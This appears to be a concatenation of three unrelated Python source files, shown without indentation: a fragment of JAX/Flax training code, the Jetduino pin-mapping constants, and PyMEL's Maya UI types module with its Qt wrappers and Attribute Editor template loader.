for i in range(len(keys)):
new_batch[keys[i]] = interpolated_batch_keys[i][j]
interpolated_batches.append(new_batch)
return interpolated_batches
def stateful_forward_pass(self,
flax_model,
train_state,
batch,
input_key='input',
train=True):
(env_logits, all_env_reps, selected_env_reps,
new_model_state) = self.forward_pass(flax_model, train_state, batch,
nn.make_rng(), input_key, train)
# Model state, e.g. batch statistics, are averaged over all environments
# because we use vmapped_flax_module_train.
new_model_state = jax.tree_util.tree_map(
functools.partial(jnp.mean, axis=0), new_model_state)
# Update the model state already, since there is going to be another forward
# pass.
train_state = train_state.replace(model_state=new_model_state)
return all_env_reps, env_logits, selected_env_reps, train_state
|
#!/usr/bin/env python
#
# Jetduino Python library
# v1.0.0
#
# This file provides the basic mappings of the pins for the arduino and jetson for use with the Jetduino
#
# The Jetduino connects the Jetson and Grove sensors. You can learn more about the Jetduino here: http://www.NeuroRoboticTech.com/Projects/Jetduino
#
# Have a question about this example? Ask on the forums here: http://www.NeuroRoboticTech.com/Forum
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Jetduino for the Jetson TK1/TX1: an open source platform for connecting
Grove Sensors to the Jetson embedded supercomputers.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
#You can find the original due pin mappings in this file on windows.
#C:\Users\your_user_id\AppData\Local\Arduino15\packages\arduino\hardware\sam\1.6.6\variants\arduino_due_x\pins_arduino.h
ARD_D0 = 0
ARD_D1 = 1
ARD_D2 = 2
ARD_D3 = 3
ARD_D4 = 4
ARD_D5 = 5
ARD_D6 = 6
ARD_D7 = 7
ARD_D8 = 8
ARD_D9 = 9
ARD_D10 = 10
ARD_D11 = 11
ARD_D12 = 12
ARD_D13 = 13
ARD_D14 = 14
ARD_D15 = 15
ARD_D16 = 16
ARD_D17 = 17
ARD_D18 = 18
ARD_D19 = 19
ARD_D20 = 20
ARD_D21 = 21
ARD_D22 = 22
ARD_D23 = 23
ARD_D24 = 24
ARD_D25 = 25
ARD_D26 = 26
ARD_D27 = 27
ARD_D28 = 28
ARD_D29 = 29
ARD_D30 = 30
ARD_D31 = 31
ARD_D32 = 32
ARD_D33 = 33
ARD_D34 = 34
ARD_D35 = 35
ARD_D36 = 36
ARD_D37 = 37
ARD_D38 = 38
ARD_D39 = 39
ARD_D40 = 40
ARD_D41 = 41
ARD_D42 = 42
ARD_D43 = 43
ARD_D44 = 44
ARD_D45 = 45
ARD_D46 = 46
ARD_D47 = 47
ARD_D48 = 48
ARD_D49 = 49
ARD_D50 = 50
ARD_D51 = 51
ARD_D52 = 52
ARD_D53 = 53
ARD_A0 = 54
ARD_A1 = 55
ARD_A2 = 56
ARD_A3 = 57
ARD_A4 = 58
ARD_A5 = 59
ARD_A6 = 60
ARD_A7 = 61
ARD_A8 = 62
ARD_A9 = 63
ARD_A10 = 64
ARD_A11 = 65
ARD_A12 = 66
ARD_A13 = 67
ARD_A14 = 68
ARD_A15 = 69
ARD_DAC0 = 66
ARD_DAC1 = 67
JET_A0 = 100
JET_A1 = 101
JET_A2 = 102
JET_A3 = 103
# This one has been increased by 100 to make
# it outside the range of the arduino pins.
JET_PH1 = 157
JET_PK1 = 81
JET_PK2 = 82
JET_PK4 = 84
JET_PU0 = 160
JET_PU1 = 161
JET_PU2 = 162
JET_PU3 = 163
JET_PU4 = 164
JET_PU5 = 165
JET_PU6 = 166
OUTPUT_PIN = 1
INPUT_PIN = 0
HIGH = 1
LOW = 0
CLOCKWISE = 1
COUNTER_CLOCKWISE = 0
|
import sys
import re
import pymel.util as _util
import pymel.internal.pmcmds as cmds
import pymel.internal.factories as _factories
import pymel.internal.startup as _startup
import pymel.internal as _internal
import pymel.versions as _versions
import maya.mel as _mm
_logger = _internal.getLogger(__name__)
def _resolveUIFunc(name):
if isinstance(name, basestring):
import windows
try:
return getattr(windows, name)
except AttributeError:
try:
cls = getattr(dynModule, name)
return cls.__melcmd__()
except (KeyError, AttributeError):
pass
else:
import inspect
if inspect.isfunction(name):
return name
elif inspect.isclass(name) and issubclass(name, PyUI):
name.__melcmd__()
raise ValueError, "%r is not a known ui type" % name
if _versions.current() >= _versions.v2011:
def toPyQtObject(mayaName):
"""
Given the name of a Maya UI element of any type, return the corresponding QWidget or QAction.
If the object does not exist, returns None
When using this function you don't need to specify whether UI type is a control, layout,
window, or menuItem, the first match -- in that order -- will be returned. If you have the full path to a UI object
this should always be correct, however, if you only have the short name of the UI object,
consider using one of the more specific variants: `toQtControl`, `toQtLayout`, `toQtWindow`, or `toQtMenuItem`.
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtcore.QObject)
def toPyQtControl(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtLayout(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtWindow(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findWindow(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtMenuItem(mayaName):
"""
Given the name of a May UI menuItem, return the corresponding QAction.
If the object does not exist, returns None
This only works for menu items. for Menus, use toQtControl or toQtObject
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QAction)
# PYSIDE VERSIONS
def pysideWrapInstance(ptr, base=None):
'''Utility to convert a point to a Qt Class and produce the same result
as sip.wrapinstance using shiboken.wrapInstance.
Note: This is modeled after nathanhorne.com/?p=486. The base arg isn't
currently used, and defaults to QObject. The way that base arg was used
seems like it would give a different result than the sip version. It would
skip the checking for attribute and just use base as base, however the sip
version will still return QMainWindow even if QObject is passed in.
'''
if ptr is None:
return
try:
import PySide2.QtCore as qtcore
import PySide2.QtGui as qtgui
import PySide2.QtWidgets as qtwidgets
from shiboken2 import wrapInstance
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtgui
import PySide.QtGui as qtwidgets
from shiboken import wrapInstance
qObj = wrapInstance(long(ptr), qtcore.QObject)
metaObj = qObj.metaObject()
cls = metaObj.className()
superCls = metaObj.superClass().className()
if hasattr(qtgui, cls):
base = getattr(qtgui, cls)
elif hasattr(qtgui, superCls):
base = getattr(qtgui, superCls)
elif hasattr(qtwidgets, cls):
base = getattr(qtwidgets, cls)
elif hasattr(qtwidgets, superCls):
base = getattr(qtwidgets, superCls)
else:
base = qtwidgets.QWidget
return wrapInstance(long(ptr), base)
def toPySideObject(mayaName):
"""
Given the name of a Maya UI element of any type, return the corresponding QWidget or QAction.
If the object does not exist, returns None
When using this function you don't need to specify whether UI type is a control, layout,
window, or menuItem, the first match -- in that order -- will be returned. If you have the full path to a UI object
this should always be correct, however, if you only have the short name of the UI object,
consider using one of the more specific variants: `toQtControl`, `toQtLayout`, `toQtWindow`, or `toQtMenuItem`.
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import PySide2.QtCore as qtcore
except ImportError:
import PySide.QtCore as qtcore
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtcore.QObject)
def toPySideControl(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideLayout(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideWindow(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findWindow(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideMenuItem(mayaName):
"""
Given the name of a Maya UI menuItem, return the corresponding QAction.
If the object does not exist, returns None
This only works for menu items. for Menus, use toQtControl or toQtObject
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QAction)
# Assign functions to PyQt versions if PyQt is available, otherwise set to PySide versions
try:
import sip
import PyQt4
pyQtAvailable = True
except ImportError:
pyQtAvailable = False
try:
import shiboken
import PySide
pySideAvailable = True
except ImportError:
pySideAvailable = False
try:
import shiboken2
import PySide2
pySideAvailable = True
except ImportError:
pySideAvailable = False
if pyQtAvailable and not pySideAvailable:
qtBinding = 'pyqt'
elif pySideAvailable and not pyQtAvailable:
qtBinding = 'pyside'
else:
qtBinding = _startup.pymel_options['preferred_python_qt_binding']
if qtBinding == 'pyqt':
toQtObject = toPyQtObject
toQtControl = toPyQtControl
toQtLayout = toPyQtLayout
toQtWindow = toPyQtWindow
toQtMenuItem = toPyQtMenuItem
elif qtBinding == 'pyside':
toQtObject = toPySideObject
toQtControl = toPySideControl
toQtLayout = toPySideLayout
toQtWindow = toPySideWindow
toQtMenuItem = toPySideMenuItem
else:
raise ValueError('preferred_python_qt_binding must be set to either'
' pyside or pyqt')
# really, this should be in core.windows; but, due to that fact that this module
# is "higher" in the import hierarchy than core.windows, and we need this function
# here, we're just defining it here
@_factories.addMelDocs('objectTypeUI')
def objectTypeUI(name, **kwargs):
try:
return cmds.objectTypeUI(name, **kwargs)
except RuntimeError, topError:
try:
# some ui types (radioCollections) can only be identified with their shortname
return cmds.objectTypeUI(name.split('|')[-1], **kwargs)
except RuntimeError:
# we cannot query the type of rowGroupLayout children: check common types for these
uiType = None
typesToCheck = 'checkBox floatField button floatSlider intSlider ' \
'floatField textField intField optionMenu radioButton'.split()
if _versions.current() >= _versions.v2012_SP2:
# 2012 SP2 introducted a bug where doing:
# win = cmds.window(menuBar=True)
# cmds.objectTypeUI(win)
# would error...
typesToCheck.append('window')
for cmdName in typesToCheck:
if getattr(cmds, cmdName)(name, ex=1, q=1):
uiType = cmdName
break
if uiType:
return uiType
raise topError
class PyUI(unicode):
def __new__(cls, name=None, create=False, **kwargs):
"""
Provides the ability to create the PyUI Element when creating a class::
import pymel.core as pm
n = pm.Window("myWindow",create=True)
n.__repr__()
# Result: Window('myWindow')
"""
if cls is PyUI:
try:
uiType = objectTypeUI(name)
except RuntimeError:
uiType = 'PyUI'
uiType = _uiTypesToCommands.get(uiType, uiType)
try:
newcls = getattr(dynModule, _util.capitalize(uiType))
except AttributeError:
newcls = PyUI
# objectTypeUI for panels seems to return weird results -
# ie, TmodelPane ... check for them this way.
# Other types should be detected correctly by objectTypeUI,
# but this just provides a failsafe...
for testType in 'panel scriptedPanel window control layout menu'.split():
if getattr(cmds, testType)(name, ex=1, q=1):
newcls = getattr(dynModule, _util.capitalize(testType),
PyUI)
if newcls != PyUI:
break
else:
newcls = cls
if not newcls is PyUI:
if cls._isBeingCreated(name, create, kwargs):
name = newcls.__melcmd__(name, **kwargs)
_logger.debug("PyUI: created... %s" % name)
else:
# find the long name
if '|' not in name and not issubclass(newcls,
(Window,
Panel,
dynModule.ScriptedPanel,
dynModule.RadioCollection,
dynModule.ToolCollection)):
import windows
try:
if issubclass(newcls, Layout):
parent = windows.layout(name, q=1, p=1)
elif issubclass(newcls, OptionMenu):
parent = windows.optionMenu(name, q=1, p=1)
elif issubclass(newcls, Menu):
parent = windows.menu(name, q=1, p=1)
else:
parent = windows.control(name, q=1, p=1)
if parent:
name = parent + '|' + name
except RuntimeError:
# editors don't have a long name, so we keep the short name
if name not in cmds.lsUI(long=True, editors=True):
raise
# correct for optionMenu
if newcls == PopupMenu and cmds.optionMenu(name, ex=1):
newcls = OptionMenu
return unicode.__new__(newcls, name)
@staticmethod
def _isBeingCreated(name, create, kwargs):
"""
create a new node when any of these conditions occur:
name is None
create is True
parent flag is set
"""
return not name or create or ('q' not in kwargs and kwargs.get('parent', kwargs.get('p', None)))
def __repr__(self):
return u"ui.%s('%s')" % (self.__class__.__name__, self)
def parent(self):
buf = unicode(self).split('|')[:-1]
if len(buf) == 2 and buf[0] == buf[1] and _versions.current() < _versions.v2011:
# pre-2011, windows with menus can have a strange name:
# ex. window1|window1|menu1
buf = buf[:1]
if not buf:
return None
return PyUI('|'.join(buf))
getParent = parent
def shortName(self):
return unicode(self).split('|')[-1]
def name(self):
return unicode(self)
def window(self):
return Window(self.name().split('|')[0])
delete = _factories.functionFactory('deleteUI', rename='delete')
rename = _factories.functionFactory('renameUI', rename='rename')
type = objectTypeUI
@classmethod
def exists(cls, name):
return cls.__melcmd__(name, exists=True)
if _versions.current() >= _versions.v2011:
asQtObject = toQtControl
class Panel(PyUI):
"""pymel panel class"""
__metaclass__ = _factories.MetaMayaUIWrapper
# note that we're not actually customizing anything, but
# we're declaring it here because other classes will have this
# as their base class, so we need to make sure it exists first
_withParentStack = []
_withParentMenuStack = []
class Layout(PyUI):
def __enter__(self):
global _withParentStack
_withParentStack.append(self)
self.makeDefault()
return self
def __exit__(self, type, value, traceback):
global _withParentStack
_withParentStack.pop()
if _withParentStack:
parent = _withParentStack[-1]
else:
parent = self.pop()
while parent and objectTypeUI(parent) == u'rowGroupLayout':
parent = parent.pop()
cmds.setParent(parent)
def children(self):
# return [ PyUI( self.name() + '|' + x) for x in self.__melcmd__(self, q=1, childArray=1) ]
kids = cmds.layout(self, q=1, childArray=1)
if kids:
return [PyUI(self.name() + '|' + x) for x in kids]
return []
getChildren = children
# TODO: add depth firt and breadth first options
def walkChildren(self):
"""
recursively yield all children of this layout
"""
for child in self.children():
yield child
if hasattr(child, 'walkChildren'):
for subChild in child.walkChildren():
yield subChild
def findChild(self, shortName, recurse=False):
if recurse:
for child in self.walkChildren():
if child.shortName() == shortName:
return child
else:
for child in self.children():
if child.shortName() == shortName:
return child
def addChild(self, uiType, name=None, **kwargs):
if isinstance(uiType, basestring):
uiType = getattr(dynModule, uiType)
assert hasattr(uiType, '__call__'), 'argument uiType must be the name of a known ui type, a UI subclass, or a callable object'
args = []
if name:
args.append(name)
if kwargs:
if 'parent' in kwargs or 'p' in kwargs:
_logger.warn('parent flag is set by addChild automatically. passed value will be ignored')
kwargs.pop('parent', None)
kwargs.pop('p', None)
kwargs['parent'] = self
res = uiType(*args, **kwargs)
if not isinstance(res, PyUI):
res = PyUI(res)
return res
def makeDefault(self):
"""
set this layout as the default parent
"""
cmds.setParent(self)
def pop(self):
"""
set the default parent to the parent of this layout
"""
p = self.parent()
cmds.setParent(p)
return p
def clear(self):
children = self.getChildArray()
if children:
for child in self.getChildArray():
cmds.deleteUI(child)
if _versions.current() >= _versions.v2011:
asQtObject = toQtLayout
# customized ui classes
class Window(Layout):
"""pymel window class"""
__metaclass__ = _factories.MetaMayaUIWrapper
# if _versions.current() < _versions.v2011:
# # don't set
# def __enter__(self):
# return self
def __exit__(self, type, value, traceback):
super(Window, self).__exit__(type, value, traceback)
self.show()
def show(self):
cmds.showWindow(self)
def delete(self):
cmds.deleteUI(self, window=True)
def layout(self):
name = self.name()
for layout in sorted(cmds.lsUI(long=True, controlLayouts=True)):
# since we are sorted, shorter will be first, and the first layout we come across will be the base layout
if layout.startswith(name):
return PyUI(layout)
# # create a child and then delete it to get the layout
# res = self.addChild(cmds.columnLayout)
# layout = res.parent()
# res.delete()
# return layout
def children(self):
res = self.layout()
return [res] if res else []
getChildren = children
def window(self):
return self
def parent(self):
return None
getParent = parent
if _versions.current() >= _versions.v2011:
asQtObject = toQtWindow
class FormLayout(Layout):
__metaclass__ = _factories.MetaMayaUIWrapper
def __new__(cls, name=None, **kwargs):
if kwargs:
[kwargs.pop(k, None) for k in ['orientation', 'ratios', 'reversed', 'spacing']]
self = Layout.__new__(cls, name, **kwargs)
return self
def __init__(self, name=None, orientation='vertical', spacing=2, reversed=False, ratios=None, **kwargs):
"""
spacing - absolute space between controls
orientation - the orientation of the layout [ AutoLayout.HORIZONTAL | AutoLayout.VERTICAL ]
"""
Layout.__init__(self, **kwargs)
self._spacing = spacing
self._orientation = self.Orientation.getIndex(orientation)
self._reversed = reversed
self._ratios = ratios and list(ratios) or []
def attachForm(self, *args):
kwargs = {'edit': True}
kwargs['attachForm'] = [args]
cmds.formLayout(self, **kwargs)
def attachControl(self, *args):
kwargs = {'edit': True}
kwargs['attachControl'] = [args]
cmds.formLayout(self, **kwargs)
def attachNone(self, *args):
kwargs = {'edit': True}
kwargs['attachNone'] = [args]
cmds.formLayout(self, **kwargs)
def attachPosition(self, *args):
kwargs = {'edit': True}
kwargs['attachPosition'] = [args]
cmds.formLayout(self, **kwargs)
HORIZONTAL = 0
VERTICAL = 1
Orientation = _util.enum.Enum('Orientation', ['horizontal', 'vertical'])
def flip(self):
"""Flip the orientation of the layout """
self._orientation = 1 - self._orientation
self.redistribute(*self._ratios)
def reverse(self):
"""Reverse the children order """
self._reversed = not self._reversed
self._ratios.reverse()
self.redistribute(*self._ratios)
def reset(self):
self._ratios = []
self._reversed = False
self.redistribute()
def redistribute(self, *ratios):
"""
Redistribute the child controls based on the ratios.
If not ratios are given (or not enough), 1 will be used
"""
sides = [["top", "bottom"], ["left", "right"]]
children = self.getChildArray()
if not children:
return
if self._reversed:
children.reverse()
ratios = list(ratios) or self._ratios or []
ratios += [1] * (len(children) - len(ratios))
self._ratios = ratios
total = sum(ratios)
for i, child in enumerate(children):
for side in sides[self._orientation]:
self.attachForm(child, side, self._spacing)
if i == 0:
self.attachForm(child,
sides[1 - self._orientation][0],
self._spacing)
else:
self.attachControl(child,
sides[1 - self._orientation][0],
self._spacing,
children[i - 1])
if ratios[i]:
self.attachPosition(children[i],
sides[1 - self._orientation][1],
self._spacing,
float(sum(ratios[:i + 1])) / float(total) * 100)
else:
self.attachNone(children[i],
sides[1 - self._orientation][1])
def vDistribute(self, *ratios):
self._orientation = int(self.Orientation.vertical)
self.redistribute(*ratios)
def hDistribute(self, *ratios):
self._orientation = int(self.Orientation.horizontal)
self.redistribute(*ratios)
class AutoLayout(FormLayout):
"""
AutoLayout behaves exactly like `FormLayout`, but will call redistribute automatically
at the end of a 'with' statement block
"""
def __exit__(self, type, value, traceback):
self.redistribute()
super(AutoLayout, self).__exit__(type, value, traceback)
class RowLayout(Layout):
__metaclass__ = _factories.MetaMayaUIWrapper
class TextScrollList(PyUI):
__metaclass__ = _factories.MetaMayaUIWrapper
def extend(self, appendList):
""" append a list of strings"""
for x in appendList:
self.append(x)
def selectIndexedItems(self, selectList):
"""select a list of indices"""
for x in selectList:
self.setSelectIndexedItem(x)
def removeIndexedItems(self, removeList):
"""remove a list of indices"""
for x in removeList:
self.removeIndexedItem(x)
def selectAll(self):
"""select all items"""
numberOfItems = self.getNumberOfItems()
self.selectIndexedItems(range(1, numberOfItems + 1))
class Menu(PyUI):
__metaclass__ = _factories.MetaMayaUIWrapper
def __enter__(self):
global _withParentMenuStack
_withParentMenuStack.append(self)
self.makeDefault()
return self
def __exit__(self, type, value, traceback):
global _withParentMenuStack
_withParentMenuStack.pop()
if _withParentMenuStack:
cmds.setParent(_withParentMenuStack[-1], menu=True)
else:
parent = self
while True:
parent = parent.parent()
# Maya 2012 Service Pack 2 (or SAP1, SP1) introduces a bug where
# '' is returned, instead of None; problem being that doing
# cmds.setParent(None, menu=True) is valid, but
# cmds.setParent('', menu=True) is not
if parent == '':
parent = None
try:
cmds.setParent(parent, menu=True)
except RuntimeError:
continue
break
def getItemArray(self):
""" Modified to return pymel instances """
return [MenuItem(self + '|' + item) for item in cmds.menu(self, query=True, itemArray=True) or []]
def makeDefault(self):
"""
set this layout as the default parent
"""
cmds.setParent(self, menu=True)
class PopupMenu(Menu):
__metaclass__ = _factories.MetaMayaUIWrapper
class OptionMenu(PopupMenu):
__metaclass__ = _factories.MetaMayaUIWrapper
def addMenuItems(self, items, title=None):
""" Add the specified item list to the OptionMenu, with an optional 'title' item """
if title:
cmds.menuItem(l=title, en=0, parent=self)
for item in items:
cmds.menuItem(l=item, parent=self)
def clear(self):
""" Clear all menu items from this OptionMenu """
for t in self.getItemListLong() or []:
cmds.deleteUI(t)
addItems = addMenuItems
class OptionMenuGrp(RowLayout):
__metaclass__ = _factories.MetaMayaUIWrapper
def menu(self):
for child in self.children():
if isinstance(child, OptionMenu):
return child
# Want to set both the menu to the child |OptionMenu item, and the normal
# parent to this...
def __enter__(self):
self.menu().__enter__()
return super(OptionMenuGrp, self).__enter__()
def __exit__(self, type, value, traceback):
self.menu().__exit__(type, value, traceback)
return super(OptionMenuGrp, self).__exit__(type, value, traceback)
class SubMenuItem(Menu):
def getBoldFont(self):
return cmds.menuItem(self, query=True, boldFont=True)
def getItalicized(self):
return cmds.menuItem(self, query=True, italicized=True)
if _versions.current() >= _versions.v2011:
asQtObject = toQtMenuItem
class CommandMenuItem(PyUI):
__metaclass__ = _factories.MetaMayaUIWrapper
__melui__ = 'menuItem'
def __enter__(self):
SubMenuItem(self).__enter__()
return self
def __exit__(self, type, value, traceback):
return SubMenuItem(self).__exit__(type, value, traceback)
def MenuItem(name=None, create=False, **kwargs):
if PyUI._isBeingCreated(name, create, kwargs):
cls = CommandMenuItem
else:
try:
uiType = objectTypeUI(name)
except RuntimeError:
cls = SubMenuItem
else:
if uiType == 'subMenuItem':
cls = SubMenuItem
else:
cls = CommandMenuItem
return cls(name, create, **kwargs)
class UITemplate(object):
"""
from pymel.core import *
# force deletes the template if it already exists
template = ui.UITemplate( 'ExampleTemplate', force=True )
template.define( button, width=100, height=40, align='left' )
template.define( frameLayout, borderVisible=True, labelVisible=False )
# Create a window and apply the template.
#
with window():
with template:
with columnLayout( rowSpacing=5 ):
with frameLayout():
with columnLayout():
button( label='One' )
button( label='Two' )
button( label='Three' )
with frameLayout():
with columnLayout():
button( label='Red' )
button( label='Green' )
button( label='Blue' )
"""
def __init__(self, name=None, force=False):
if name and cmds.uiTemplate(name, exists=True):
if force:
cmds.deleteUI(name, uiTemplate=True)
else:
self._name = name
return
args = [name] if name else []
self._name = cmds.uiTemplate(*args)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._name)
def __enter__(self):
self.push()
return self
def __exit__(self, type, value, traceback):
self.pop()
def name(self):
return self._name
def push(self):
cmds.setUITemplate(self._name, pushTemplate=True)
def pop(self):
cmds.setUITemplate(popTemplate=True)
def define(self, uiType, **kwargs):
"""
uiType can be:
- a ui function or class
- the name of a ui function or class
- a list or tuple of the above
"""
if isinstance(uiType, (list, tuple)):
funcs = [_resolveUIFunc(x) for x in uiType]
else:
funcs = [_resolveUIFunc(uiType)]
kwargs['defineTemplate'] = self._name
for func in funcs:
func(**kwargs)
@staticmethod
def exists(name):
return cmds.uiTemplate(name, exists=True)
class AELoader(type):
"""
Metaclass used by `AETemplate` class to create wrapping and loading mechanisms when an AETemplate instance is created
"""
_loaded = []
def __new__(cls, classname, bases, classdict):
newcls = super(AELoader, cls).__new__(cls, classname, bases, classdict)
try:
nodeType = newcls.nodeType()
except ValueError:
_logger.debug("could not determine node type for " + classname)
else:
modname = classdict['__module__']
if modname == '__builtin__':
# since the module is __builtin__ our AE was probably included in the body of a scripted
# plugin, which is called by maya in a strange way ( execfile? ).
# give it a real home so we can load it later.
mod = sys.modules['__builtin__']
setattr(mod, classname, newcls)
template = 'AE' + nodeType + 'Template'
cls.makeAEProc(modname, classname, template)
if template not in cls._loaded:
cls._loaded.append(template)
return newcls
@staticmethod
def makeAEProc(modname, classname, procname):
_logger.debug("making AE loader procedure: %s" % procname)
contents = '''global proc %(procname)s( string $nodeName ){
python("import %(__name__)s;%(__name__)s.AELoader.load('%(modname)s','%(classname)s','" + $nodeName + "')");}'''
d = locals().copy()
d['__name__'] = __name__
import maya.mel as mm
mm.eval(contents % d)
@staticmethod
def load(modname, classname, nodename):
mod = __import__(modname, globals(), locals(), [classname], -1)
try:
cls = getattr(mod, classname)
cls(nodename)
except Exception:
print "failed to load python attribute editor template '%s.%s'" % (modname, classname)
import traceback
traceback.print_exc()
@classmethod
def loadedTemplates(cls):
"Return the names of the loaded templates"
return cls._loaded
class AETemplate(object):
"""
To create an Attribute Editor template using python, do the following:
1. create a subclass of `uitypes.AETemplate`
2. set its ``_nodeType`` class attribute to the name of the desired node type, or name the class using the
convention ``AE<nodeType>Template``
3. import the module
AETemplates which do not meet one of the two requirements listed in step 2 will be ignored. To ensure that your
Template's node type is being detected correctly, use the ``AETemplate.nodeType()`` class method::
import AETemplates
AETemplates.AEmib_amb_occlusionTemplate.nodeType()
As a convenience, when pymel is imported it will automatically import the module ``AETemplates``, if it exists,
thereby causing any AETemplates within it or its sub-modules to be registered. Be sure to import pymel
or modules containing your ``AETemplate`` classes before opening the Atrribute Editor for the node types in question.
To check which python templates are loaded::
from pymel.core.uitypes import AELoader
print AELoader.loadedTemplates()
"""
__metaclass__ = AELoader
_nodeType = None
def __init__(self, nodeName):
self._nodeName = nodeName
@property
def nodeName(self):
return self._nodeName
@classmethod
def nodeType(cls):
if cls._nodeType:
return cls._nodeType
else:
m = re.match('AE(.+)Template$', cls.__name__)
if m:
return m.groups()[0]
else:
raise ValueError("You must either name your AETemplate subclass of the form 'AE<nodeType>Template' or set the '_nodeType' class attribute")
@classmethod
def controlValue(cls, nodeName, control):
return cmds.editorTemplate(queryControl=(nodeName, control))
@classmethod
def controlLabel(cls, nodeName, control):
return cmds.editorTemplate(queryLabel=(nodeName, control))
@classmethod
def reload(cls):
"Reload the template. Beware, this reloads the module in which the template exists!"
nodeType = cls.nodeType()
form = "AttrEd" + nodeType + "FormLayout"
exists = cmds.control(form, exists=1) and cmds.formLayout(form, q=1, ca=1)
if exists:
sel = cmds.ls(sl=1)
cmds.select(cl=True)
cmds.deleteUI(form)
if sel:
cmds.select(sel)
reload(sys.modules[cls.__module__])
def addControl(self, control, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False):
args = [control]
kwargs = {'preventOverride': preventOverride}
if dynamic:
kwargs['addDynamicControl'] = True
else:
kwargs['addControl'] = True
if changeCommand:
if hasattr(changeCommand, '__call__'):
import pymel.tools.py2mel
name = self.__class__.__name__ + '_callCustom_changeCommand_' + control
changeCommand = pymel.tools.py2mel.py2melProc(changeCommand, procName=name, argTypes=['string'])
args.append(changeCommand)
if label:
kwargs['label'] = label
if annotation:
kwargs['annotation'] = annotation
cmds.editorTemplate(*args, **kwargs)
def callCustom(self, newFunc, replaceFunc, *attrs):
#cmds.editorTemplate(callCustom=( (newFunc, replaceFunc) + attrs))
import pymel.tools.py2mel
if hasattr(newFunc, '__call__'):
name = self.__class__.__name__ + '_callCustom_newFunc_' + '_'.join(attrs)
